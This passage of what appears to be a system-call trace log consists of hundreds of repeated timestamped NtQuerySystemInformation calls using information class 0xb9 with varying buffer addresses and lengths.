Length=0x20, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, Length=0x20, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, Length=0x20, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, Length=0x20, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd00, Length=0x20, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x20, ResultLength=0x0) [0234.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb70, Length=0x20, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb00, Length=0x20, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdab0, Length=0x20, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x20, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfc0, Length=0x28, ResultLength=0x0) [0234.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf08, Length=0x28, ResultLength=0x0) [0234.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf08, Length=0x28, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf08, Length=0x28, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf08, Length=0x28, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf08, Length=0x28, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf08, Length=0x28, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf08, Length=0x28, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde70, Length=0x20, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde70, Length=0x20, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf08, Length=0x28, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde80, Length=0x40, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde80, Length=0x40, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd30, Length=0x20, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd30, Length=0x20, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde80, Length=0x40, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde80, Length=0x40, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde80, Length=0x40, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdde0, Length=0x20, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdde0, Length=0x20, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdde0, Length=0x20, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde80, Length=0x40, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde10, Length=0x20, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddb0, Length=0x20, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddb0, Length=0x20, ResultLength=0x0) [0234.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde80, Length=0x40, ResultLength=0x0) [0234.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde80, Length=0x40, ResultLength=0x0) [0234.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde80, Length=0x40, ResultLength=0x0) [0234.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde80, Length=0x40, ResultLength=0x0) [0234.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc90, Length=0x28, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x48, ResultLength=0x0) [0234.159] NtQuerySystemInformation (SystemInformationClass=0xb9, 